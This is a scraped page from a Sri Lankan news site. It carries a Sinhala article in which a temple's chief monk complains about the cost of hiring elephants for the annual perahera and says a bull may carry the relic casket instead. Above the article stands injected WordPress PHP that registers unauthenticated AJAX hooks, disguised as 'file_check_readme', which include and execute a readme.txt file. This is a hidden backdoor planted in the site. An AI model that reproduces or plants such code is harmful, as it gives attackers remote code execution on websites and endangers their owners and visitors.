if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } අලි දෙන ක්‍රමයක් නැත්නම් ගෝණාගේ පිටේ කරඬුව වඩම්මන බව හිමි නමක් කියයි - mediahumanrights.lk
mediahumanrights.lk
Local News News

අලි දෙන ක්‍රමයක් නැත්නම් ගෝණාගේ පිටේ කරඬුව වඩම්මන බව හිමි නමක් කියයි

ආගම සංස්කෘතියවත් රැක ගෙන ඉදිරියට පවත්වාගෙන යන්න අපේ ඓතිහාසික වාර්ෂික පෙරහැරට අලි දෙන ක‍්‍රම වේදය රජය සහ අලි හිමියන්  නිසි ලෙස ඉටු නොකරනවානම් පන්සලේ ඉන්න ගෝනාගේ පිටමත කරඩුව වැඩම වන බව මැදිලිය රජමහ විහාරයේ විහාරාධිපති ඉලූග්ගොඩ ඥාණානන්ද ස්වාමින් වහන්සේ පවසනවා.
උන්වහන්සේ විසින් විහාරස්ථානයේ වාර්ෂික පෙරහැර පැවැත්විමට අලි ඇතුන් ලබා ගැනිමට තිබෙන දුෂ්කරතාවය සම්බන්ධයෙන් අද (15) මෙලෙස සිය අදහස් පල කළා
“අපිට අලි ලබා ගැනිමේදි පෙරහැරට ඉතාම අපහසුකාරණයක් වනවා. ඒ අපහසුකාරය මොකද්ද ප‍්‍රදේශයේ අලි ඉන්න අයගෙන් අලි ලබා ගන්නකොටත් ඒ අය බොහෝ දුරට මැසිවිලි නගනවා අලි දෙන්න පුළුවන් ක‍්‍රමක් නැහැ කියලා. අපිට විශේෂයෙන් දෙවියන් හා කරඩුව වැඩමවන්න අලි දෙන්නෙක් පමණක් හිටියත් ප‍්‍රමාණවත් මිට පෙර වසර වල අපි අලි 7 දෙනා 8 දෙනා පෙරහැරට සම්බන්ධ කරගෙන පෙරහැර අලංකාර කර ගෙන තිබෙනවා.
මේ අවුරුද්දේ රජය විසින් විශේෂයෙන් වනජිවි ඇමැති ගාමිණි ජයවික‍්‍රම මහතා අපිට නිවේදන නිකුත් කරලා තිබෙනවා පුවත් පත් මගින් ඒ වාගේම විද්‍යුත් ජනමාධ්‍ය මගින් විහාරස්ථාන වල පෙරහැරවල් සඳහා අලි ඇතුන් ලබා දෙනවා පින්නවල සත්තුවත්තෙන් කියලා. මමත් ඒ අනුව පෙරහැරට ඉල්ලිමක් කලා අලි දෙන්නෙක් අවශ්‍යයි කියලා. නමුත් මෙ අය එතෙන්නට ගියාට පස්සේ කියන්නේ අලියෙකුට රුපියල් 33000 බදින්න ඕනෑ. ප‍්‍රවාහන කටයුතු අපි සිද්ධ කරගන්න ඕනෑ කියලා.
රඹුක්කන ඉදන් මෙ ස්ථානයට අලියා ප‍්‍රවාහනය කරගන්න රුපියල් 15000 ක් විතර යනවා. එතකොට මෙ 33000 සහ 15000 මුදලට අමතරව තවත් වියදම් යනවා එහෙම බලපුවාම 50000 කට වඩා වැඩි මුදලක් මෙ වෙනුවෙන් වියදම් වෙනවා. මෙපමණ මුදලක් අපිට ගෙවා ගන්න බැහැ. අලි දෙන්නෙක් ගත්තොත් ලක්ෂයකට වඩා මුදලක් වියදම් වෙනවා. නමුත් ජනමාධයෙන් කියන්නේ අලි නිකන් දෙන විදිහටයි. එහෙම කෙරෙන්නේ නැහැ කවදාවත්.
අලි නැත්නම් අපි දායකයන් එක්ක කථා කලා විහාරස්ථානයේ ගොනෙක් හදනවා පිනට අලි නැති වුනොත් මෙ සඳහා යොදා ගෝනා යොදාගන්නවා. පස්සේ දායකයන් අපි කල්පනා කලා ගෝනා ගැලපෙන්නේ නැහැ කියලා. නමුත් එහෙම යොදා ගන්න එක වරදක් නැහැ. ගෝනා කියලා කියන්නේ ඊස්වර දෙවියන්ගේ වාහානය නිසා සද්ධන්ත ගොන්නු කිහිප දෙනෙක් මෙ සඳහා යොදා ගත්තා නම් පෙරහැර කරන්න පුළුවන්.
අරණායක ප‍්‍රාදේශිය ලේකම් බල ප්‍රදේශයේ පිහිටි මෙම ඓතිහාසික විහාරස්ථානයේ වාර්ෂිකව පැවැත්වෙන ඇසළ මහ පෙරහැර මෙවරද 16 වැනි දින රාත‍්‍රියේ පැවැත්වෙන අතර එදින රාත‍්‍රීයේ ගිණි මඩු මංගලයෙන් පසුව පසුදා අලූයම දිය කැපිමේ චාර්ත‍්‍රය සිදු කොට දහවල් පෙරහැරින් අවසන් වනවා.
(under the courtesy of nethfm news web)

Related posts

කරුණා අම්මන්ගේ විමර්ශන අවසන්

Shiran Viraj

පාලන මිල ගිලිහී, සහල් මිල දිනෙන් දින ඉහල නගී

Shiran Viraj

ඉන්දීය ධීවරයින් 345 ක් අත්අඩංගුවට…

Shiran Viraj